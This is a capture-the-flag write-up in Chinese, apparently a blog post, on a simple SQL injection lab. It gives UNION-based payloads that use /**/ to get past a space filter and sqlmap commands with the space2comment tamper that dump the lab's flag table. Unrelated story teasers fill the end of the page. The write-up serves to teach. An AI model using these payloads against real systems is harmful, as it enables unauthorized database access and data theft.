實(shí)驗(yàn)吧-web-簡(jiǎn)單的sql注入2

本系列文集:實(shí)驗(yàn)吧-Write up --將持續(xù)更新覺得還不錯(cuò)請(qǐng)給個(gè)喜歡济舆，感謝钝诚！

SQL注入詳細(xì)講解：
DVWA-SQL Injection(SQL注入)
SQL手工注入語(yǔ)句
 sqlmap用于sql注入語(yǔ)法

方法一手動(dòng)注入

簡(jiǎn)單的注入測(cè)試:
1   正常
1'  報(bào)錯(cuò)
1' or '1'='1    SQLi detected!
1'or'1'='1      全部數(shù)據(jù)
以上說(shuō)明空格被過(guò)濾掉

1.查詢數(shù)據(jù)庫(kù)中的表（用/**/繞過(guò)空格）

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

圖片.png

發(fā)現(xiàn)flag表
2.查詢flag表中字段名

1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag

圖片.png

發(fā)現(xiàn)flag字段名
3.最后構(gòu)造出poc

1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

圖片.png

方法二sqlmap注入
點(diǎn)擊了解sqlmap詳細(xì)用法：sqlmap用于sql注入語(yǔ)法

1.查詢當(dāng)前數(shù)據(jù)庫(kù)(空格被過(guò)濾可以使用tamper腳本中space2comment)
python sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --dbs

圖片.png

發(fā)現(xiàn)web1數(shù)據(jù)庫(kù)
2.查詢數(shù)據(jù)庫(kù)中的表
python sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --tables -D web1

圖片.png

發(fā)現(xiàn)flag表
3.查詢flag表中字段名
python sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --columns -T flag -D web1

圖片.png

發(fā)現(xiàn)flag字段
4.查詢字段flag信息
python sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --dump -C flag -T flag -D web1

圖片.png

最后編輯于：2019.06.04 23:15:29

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者

人面猴
序言：七十年代末，一起剝皮案震驚了整個(gè)濱河市吃溅，隨后出現(xiàn)的幾起案子秘蛔，更是在濱河造成了極大的恐慌，老刑警劉巖犀填，帶你破解...
沈念sama閱讀 221,576評(píng)論 6贊 515
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件，死亡現(xiàn)場(chǎng)離奇詭異嗓违，居然都是意外死亡九巡，警方通過(guò)查閱死者的電腦和手機(jī)，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 94,515評(píng)論 3贊 399
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門蹂季，熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)冕广，“玉大人，你說(shuō)我怎么就攤上這事偿洁∪龊海” “怎么了？”我有些...
開封第一講書人閱讀 168,017評(píng)論 0贊 360
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵涕滋，是天一觀的道長(zhǎng)睬辐。經(jīng)常有香客問(wèn)我，道長(zhǎng)，這世上最難降的妖魔是什么溉委？我笑而不...
開封第一講書人閱讀 59,626評(píng)論 1贊 296
?港島之戀（遺憾婚禮）
正文為了忘掉前任，我火速辦了婚禮爱榕，結(jié)果婚禮上瓣喊，老公的妹妹穿的比我還像新娘。我一直安慰自己黔酥，他們只是感情好藻三，可當(dāng)我...
茶點(diǎn)故事閱讀 68,625評(píng)論 6贊 397
惡毒庶女頂嫁案：這布局不是一般人想出來(lái)的
文/花漫我一把揭開白布。她就那樣靜靜地躺著跪者，像睡著了一般棵帽。火紅的嫁衣襯著肌膚如雪。梳的紋絲不亂的頭發(fā)上渣玲，一...
開封第一講書人閱讀 52,255評(píng)論 1贊 308
城市分裂傳說(shuō)
那天逗概，我揣著相機(jī)與錄音，去河邊找鬼忘衍。笑死逾苫，一個(gè)胖子當(dāng)著我的面吹牛，可吹牛的內(nèi)容都是我干的枚钓。我是一名探鬼主播铅搓，決...
沈念sama閱讀 40,825評(píng)論 3贊 421
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼，長(zhǎng)吁一口氣：“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼搀捷！你這毒婦竟也來(lái)了星掰？” 一聲冷哼從身側(cè)響起，我...
開封第一講書人閱讀 39,729評(píng)論 0贊 276
萬(wàn)榮殺人案實(shí)錄
序言：老撾萬(wàn)榮一對(duì)情侶失蹤嫩舟，失蹤者是張志新（化名）和其女友劉穎氢烘，沒想到半個(gè)月后，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體家厌，經(jīng)...
沈念sama閱讀 46,271評(píng)論 1贊 320
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡威始，尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 38,363評(píng)論 3贊 340
?白月光啟示錄
正文我和宋清朗相戀三年，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了像街。大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片黎棠。...
茶點(diǎn)故事閱讀 40,498評(píng)論 1贊 352
活死人
序言：一個(gè)原本活蹦亂跳的男人離奇死亡，死狀恐怖镰绎，靈堂內(nèi)的尸體忽然破棺而出脓斩，到底是詐尸還是另有隱情，我是刑警寧澤畴栖，帶...
沈念sama閱讀 36,183評(píng)論 5贊 350
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布随静，位于F島的核電站，受9級(jí)特大地震影響，放射性物質(zhì)發(fā)生泄漏燎猛。R本人自食惡果不足惜恋捆，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 41,867評(píng)論 3贊 333
男人毒藥：我在死后第九天來(lái)索命
文/蒙蒙一、第九天我趴在偏房一處隱蔽的房頂上張望重绷。院中可真熱鬧沸停，春花似錦、人聲如沸昭卓。這莊子的主人今日做“春日...
開封第一講書人閱讀 32,338評(píng)論 0贊 24
一樁弒父案，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽(yáng)候醒。三九已至能颁，卻和暖如春，著一層夾襖步出監(jiān)牢的瞬間倒淫，已是汗流浹背伙菊。一陣腳步聲響...
開封第一講書人閱讀 33,458評(píng)論 1贊 272
情欲美人皮
我被黑心中介騙來(lái)泰國(guó)打工，沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留敌土，地道東北人占业。一個(gè)月前我還...
沈念sama閱讀 48,906評(píng)論 3贊 376
代替公主和親
正文我出身青樓，卻偏偏與公主長(zhǎng)得像纯赎，于是被迫代替她去往敵國(guó)和親谦疾。傳聞我的和親對(duì)象是個(gè)殘疾皇子，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 45,507評(píng)論 2贊 359

實(shí)驗(yàn)吧-web-簡(jiǎn)單的sql注入2

推薦閱讀更多精彩內(nèi)容